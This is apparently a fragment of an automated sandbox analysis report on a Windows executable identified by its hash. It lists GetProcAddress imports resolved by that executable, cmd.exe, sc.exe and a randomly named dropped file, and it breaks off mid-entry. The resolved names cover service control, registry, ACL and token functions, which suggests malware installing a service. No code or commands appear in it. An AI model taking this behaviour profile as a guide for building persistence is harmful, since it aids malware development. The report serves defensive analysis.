\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004680)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003672)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003344)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003344)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005028)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005028)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005144)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005144)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called 